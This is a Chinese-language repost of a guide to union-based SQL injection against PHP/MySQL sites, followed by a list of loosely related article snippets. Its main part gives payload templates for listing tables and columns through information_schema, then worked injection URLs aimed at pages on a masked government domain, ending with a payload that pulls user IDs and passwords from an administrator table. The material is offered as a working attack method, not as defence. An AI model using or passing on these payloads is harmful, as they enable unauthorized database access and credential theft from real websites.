php爆数据库,php+MySql注入非暴力爆数据库表段
某群主发了一篇《php+MySql注入非暴力爆数据库表段》的科普,那样的都可以发,我只好也一起发科普了。
Author:Juliet
科普:
《php+MySql注入非暴力爆数据库表段》的原文:
鉴于好多人问我关于注入猜不到表的问题,我发一下相关事例吧,其实MySql数据库的版本够了,不需要暴力猜表的,而是“查”表
表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出
查表段时的格式是:
+union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=数据库名字的hex order by table_schema limit 6,1)t limit 1--
复制代码
那么,查字段的格式就是:
+union select 1,2,column_name from (select * from information_schema.columns where table_name=爆出来的表名的hex值 and table_schema=数据库名的hex值 order by 1 limit 2,1)t limit 1--
复制代码
与爆表类似
在最后一个limit 6,1很明显是范围,从0,1、1,1、2,1、3,1的这么查下去就可以了,直到查出来想要的表名
看一个实例:
爆表:
http://www.xxx.gov.cn/newinfo.php?id=125+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10+from+(select+*+from+information_schema.tables+where+table_schema=0x796B7873676F76+order+by+table_schema+limit+0,1)t+limit+1--
复制代码
爆字:
http://www.xxx.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,column_name,4,5+from+(select+*+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72+and+table_schema=0x796B7873676F76+order+by+1+limit+2,1)t+limit+1--
复制代码
使用前面爆出来的:
http://www.xxx.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat(uid,0x5f,pwd)+from+administrator
php爆数据库,php+MySql注入非暴力爆数据库表段相关推荐
- php+MySql注入非暴力爆字段名
MySql数据库的版本够了,不需要暴力猜表的,而是"查"表 表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出 查表段时的格式是: +union select 1,2,3 ...
- mysql数据库表分区_MySQL数据库之MySQL的分区和分表详解
本文主要向大家介绍了MySQL数据库之MySQL的分区和分表详解 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助. 1. 分区 MySQL中的分区是指将一个数据表按照某种规则(如时 ...
- mysql 数据库设置mysql注入_MYSQL数据库浅析MySQL的注入安全问题
<MYSQL数据库浅析MySQL的注入安全问题>要点: 本文介绍了MYSQL数据库浅析MySQL的注入安全问题,希望对您有用.如果有疑问,可以联系我们. 如果把用户输入到一个网页,将其插入 ...
- php如何查询数据库表中数据库,PHP+MYSQL如何进行查询数据库
PHP+MYSQL进行查询数据库的方法:1.函数[mysql_fetch_object()],从结果集中取得一行作为对象,并将字段名字做为属性:2.函数[mysql_num_rows()]获取由sel ...
- 关系型数据库和mysql教材_关系型数据库(MySQL)
数据库系统DBS(DataBase System):数据库管理系统DBMS(DataBase Management System)+数据库DB(DataBase) [关系型数据库]概念: 表table ...
- hive中的数据库与mysql中的hive数据库的关系
mysql中的hive数据库是自己手动创建的,然后执行下面语句: schematool -dbType mysql -initSchema 该语句的作用是在mysql的hive数据库下建立一大堆的表格 ...
- mysql dba工作笔记pdf_社区专家在线:Oracle数据库、MySQL、Db2 等数据库日常运维故障与性能调优在线答疑...
数据库的重要性毋庸置疑,随着数据量日益增加,数据库的重要性更为凸显.DBA们作为数据库的日程运维管理人员,肩负着数据库运维的重要使命.一名合格的DBA,日常工作中需要掌握多项技能,包括数据库的故障诊断 ...
- mysql系统数据库服务器,mysql中的系统数据库服务器
mysql中的系统数据库服务器 内容精选 换一换 用户正常的数据(不包括备份数据),以及云数据库RDS实例正常运行所需的数据(比如系统数据库.数据库回滚日志.重做日志.索引等).同时,包含如下云数据库 ...
- MYSQL注入天书之数据库增删改介绍
Background-4 增删改函数介绍 在对数据进行处理上,我们经常用到的是增删查改.接下来我们讲解一下mysql 的增删改.查就是我们上述总用到的select,这里就介绍了. 增加一行数据.Ins ...
最新文章
- [二]RabbitMQ-客户端源码之AMQConnection
- 【Linux系统编程应用】 V4L2编程基础(一)
- 删除bin后,Eclipse重新编译项目
- JZTK项目 驾照题库项目servlet层得到的json字符串在浏览器中 汉字部分出现问号?无法正常显示的解决方法
- day21 pickle json shelve configpaser 模块
- 【转】Web服务软件工厂
- java中二进制怎么说_面试常用:说清楚Java中synchronized和volatile的区别
- OpenStack 云计算基础知识
- USB Repair(usb设备修复工具)官方正式版V8.0.3.1069 | u盘修复软件下载 | u盘修复软件哪个最好?
- VS2015如何添加头文件
- HTML 盒子模型( box-sizing: border-box)
- java关于时间的换算
- 【嵌入式13】两台电脑串口通信
- 将所有程序最小化到系统托盘RBTray strokeit TrayEverything
- 新浪微博下拉菜单制作(DOM小练习)
- 【JTAG、SBW、BSL】MSP430的BSL
- 数字化转型 — 新能源汽车 — 生产制造流程 — 总装车间
- [BAPI]如何读取采购订单PO审批状态数据-[BAPI_PO_GETRELINFO]
- 微信是胖客户端瘦服务器,一款管理微信客户软件的系统体系结构设计?
- 支付宝小程序获取位置API没有城市区号的最佳处理方案